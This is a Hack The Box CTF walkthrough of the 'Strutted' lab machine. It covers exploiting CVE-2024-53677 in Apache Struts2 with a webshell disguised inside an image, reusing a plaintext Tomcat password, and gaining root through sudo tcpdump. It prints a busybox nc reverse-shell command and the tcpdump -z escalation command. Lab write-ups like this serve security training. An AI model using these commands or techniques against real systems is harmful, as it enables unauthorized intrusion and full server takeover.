Hack The Box: Strutted Machine Walkthrough - Medium Difficulty

Introduction to Strutted:

This write-up will explore the “Strutted” machine from Hack The Box, categorized as a medium-difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.

Objective:

The goal of this walkthrough is to complete the “Strutted” machine from Hack The Box by achieving the following objectives:

User Flag:

Exploiting Apache Struts Vulnerability

The website offers a Docker container running a vulnerable version of Apache Struts, which is affected by CVE-2024-53677. As a result, this vulnerability can be exploited to gain an initial foothold on the system, serving as an entry point for further actions.

Moreover, further enumeration of the system uncovers the tomcat-users.xml file, which contains a plaintext password. Consequently, this password can be used to authenticate as the user “james,” thus enabling deeper access to the server and paving the way for more advanced exploits.

Root Flag:

Gaining Root Access via Sudo and Tcpdump

We exploit the use of tcpdump with sudo privileges to create a copy of the bash binary with the SUID bit set. This action ultimately allows us to gain a root shell on the system.

Enumerating the Strutted Machine

Reconnaissance:

Nmap Scan:

Begin with a network scan to identify open ports and running services on the target machine.

nmap -sC -sV -oN nmap_initial.txt 10.10.11.59

Nmap Output:

┌─[dark@parrot]─[~/Documents/htb/strutted/nmap]
└──╼ $ nmap -sC -sV -oA inital 10.10.11.59 
# Nmap 7.94SVN scan initiated Sun Jan 26 07:24:58 2025 as: nmap -sC -sV -oA inital 10.10.11.59
Nmap scan report for 10.10.11.59
Host is up (0.18s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_  256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://strutted.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jan 26 07:25:28 2025 -- 1 IP address (1 host up) scanned in 30.31 seconds

Analysis:

Port 22 (SSH): OpenSSH 8.9p1 provides secure remote access via SSH on Ubuntu Linux.
Port 80 (HTTP): nginx 1.18.0 serves web content on Ubuntu, with a redirect issue to http://strutted.htb/.

Web Enumeration on Strutted machine:

Perform web enumeration to discover potentially exploitable directories and files.

The landing page presents a static website for a company specializing in image hosting services.

Selecting “Download” initiates the retrieval of a ZIP file containing the Docker environment for the application. Upon extraction, a tomcat-users.xml file is identified, featuring a plaintext hardcoded password, though it holds no practical utility. Examination of the Dockerfile confirms that the environment is running Tomcat 9 alongside OpenJDK 17. Additionally, the package includes a pom.xml file outlining the application’s dependencies.

The application runs on Apache Struts2 version 6.3.0.1. A review of publicly available information identifies CVE-2024-53677, a vulnerability that enables remote code execution by exploiting file upload parameters to achieve path traversal. This occurs when the FileUploadInterceptor is used, allowing an attacker to upload and potentially execute a malicious file on the server. Additional research highlights that this vulnerability is specifically triggered in scenarios where the application utilizes single-file upload functionality. However, it is important to note that the vulnerability does not directly process arbitrary OGNL expressions within the file upload parameters. Instead, it relies on other aspects of the system’s handling of file uploads, which ultimately leads to the exploitation of the weakness.

Exploitation

Web Application Exploration:

CVE-2024-53677 exploitation

CVE-2024-53677 is a vulnerability affecting Apache Struts2, commonly used to build web applications. The issue stems from the FileUploadInterceptor, improperly handled file upload parameters. By exploiting this, an attacker can upload a malicious file to the server and execute it, leading to remote code execution.

Here’s how it plays out: the attacker crafts a file with a payload and uploads it through the application’s file upload feature. This grants the attacker unauthorized access, potentially compromising the entire system. It’s a reminder of how dangerous improper file handling can be in any web app.

Location: strutted/src/main/java/org/strutted/htb/Upload.java

Upon reviewing the source code, it becomes clear that the target accepts only a single valid image file. This is enforced through MIME-type checks and additional security mechanisms to block the upload of JSP files. If these validations are successful, the file is uploaded to a server directory within the uploads folder, with the directory named using the current timestamp. Any attempt to upload a file that does not meet these criteria results in an error message.

Upon uploading a valid image, we are presented with a success screen that enables us to copy the shareable link.

Clicking on “Copy Shareable Link” provides a unique link, such as a link. When navigating to this link, users are directed to a page displaying the corresponding uploaded image.

Python Script for CVE-2024-53677 on Strutted machine

Introduction: The following Python script is designed to exploit the vulnerability CVE-2024-53677 in Apache Struts. This security flaw allows attackers to manipulate file uploads on a vulnerable server, potentially leading to remote code execution. The script leverages this vulnerability to upload a malicious file to the server, enabling the execution of arbitrary commands.

Follow these steps to test the proof of concept

Clone the repository:

$ git clone https://github.com/EQSTLab/CVE-2024-53677.git

Run the script with the appropriate parameters: Run the script with the appropriate parameters:

$ python3 CVE-2024-53677.py --url http://strutted.htb/upload.action -p webshell.jsp

Exploit struts2 with CVE-2024-53677

Initially, this script is designed to demonstrate a vulnerability in Apache Struts2, a framework commonly used in web development. The vulnerability allows attackers to upload malicious files to a server, potentially enabling them to gain control of the system.

Here’s how the script works, explained in simpler terms:

Introduction and Overview: The script begins by showing details about the security flaw (CVE-2024-53677). This vulnerability allows attackers to manipulate file uploads on a server, enabling them to execute malicious code.
Uploading Malicious Files: The script’s main function upload a file containing harmful code. If successful, the file executes commands on the server, granting the attacker remote control.
Pre-Configured Malicious File: The script automatically uses a pre-written malicious file. This file runs commands on the server, potentially allowing the attacker to access sensitive data or take control.
Progress Feedback: The script shows a loading animation during the file upload to keep the user informed of the progress.
Execution and Outcome: After the upload, the script displays a message confirming the result.
Customizable Input: The script allows users to provide their file instead of using the default one. Users can also specify the target server’s URL and the file upload path.

In essence, this script showcases how an attacker can exploit a known vulnerability in Apache Struts2 to upload harmful files and gain unauthorized access to a server. It emphasizes the need for secure file upload practices to prevent such attacks.

However, nothing happens, and it appears that it’s not working as expected.

Another method of exploiting on Strutted machine

The attack strategy involves embedding a malicious JSP file within an image and then exploiting the OGNL parameter to rename the file as a JSP. This enables the triggering of our payload. We obtain the payload from a similar vulnerability disclosure and include the contents of shell.jsp below the image header in our POST request.

Security Implications

Remote Code Execution (RCE):
- The code allows attackers to execute arbitrary commands via the “cmd” parameter, which can lead to full server compromise.
Arbitrary File Operations:
- Attackers can upload, list, and delete files, potentially causing data loss or system compromise.
Lack of Input Validation:
- No checks on user input for parameters like “cmd”, making the system vulnerable to code injection.
No Authentication:
- The code lacks authentication, allowing anyone to perform operations on the server.

Risks

Server Compromise: Attackers can execute malicious commands to gain control of the system.
Data Loss: Malicious actors can delete sensitive files.
Data Exfiltration: Attackers can steal data by uploading malicious files.
Denial of Service (DoS): Excessive resource consumption can disrupt services.

Recommendations

Input Validation: Validate inputs to process only safe data.
Authentication: Implement secure user authentication and enforce proper authorization.
Least Privilege: Operate the application with the minimum necessary privileges.
Secure Libraries: Avoid using unsafe methods like Runtime.getRuntime().exec().
Logging: Set up logging to monitor and detect suspicious activities.
Regular Audits: Perform security audits and penetration testing regularly.

Troubleshooting the problem on the Strutted machine

Unfortunately, it doesn’t function as expected.

After reviewing the attack steps, I realized that we need to change “upload” to “Upload.” By exploiting the OGNL injection, we have successfully uploaded our shell. However, we are unable to test for code execution through the web browser.

The command injection functions as demonstrated above.

We are unable to execute the bash command directly here, which results in an HTTP Status 400.

Therefore, let’s create a file containing the bash command as demonstrated above.

Let’s start our listener on our machine

It hangs, which is a positive sign.

Successfully, as demonstrated above.

No binary found here

We discovered a password within the tomcat-users.xml file.

Only the “james” user is present in the home directory.

We were denied permission when attempting to switch users directly.

We can read the user flag by typing the ‘cat user.txt’ command

Escalate to Root Privileges Access on Strutted machine

Privilege Escalation:

Upon reviewing the sudo entries, we discover that the user “james” has permission to run tcpdump as root without requiring a password. Tcpdump is a network packet analyzer tool that captures and inspects network traffic.

A GTFOBin entry for tcpdump illustrates how to escalate privileges when tcpdump is configured to run with sudo permissions. We can exploit this by creating a script that copies /bin/bash to /tmp/bash_root, sets the setuid bit, and then executes it with root privileges.

Based on my understanding of the GTFOBins method, let’s leverage this technique for privilege escalation. First, we create a simple script by echoing the following command:

echo $'id\nbusybox nc 10.10.14.xxx xxxx -e /bin/bash' > pwn
chmod +x pwn<br>

This script executes the id command to check the current user and then uses busybox nc to establish a reverse shell to an attacker-controlled IP address (in this case, 10.10.14.xxx) on port xxxx, providing a remote root shell on the target system.

Next, I’ll execute the following command:

sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z ./pwn -Z root

This command runs tcpdump with elevated privileges, using the -z flag to execute the pwn script after capturing the network traffic. The -Z root flag ensures that the script is executed with root permissions.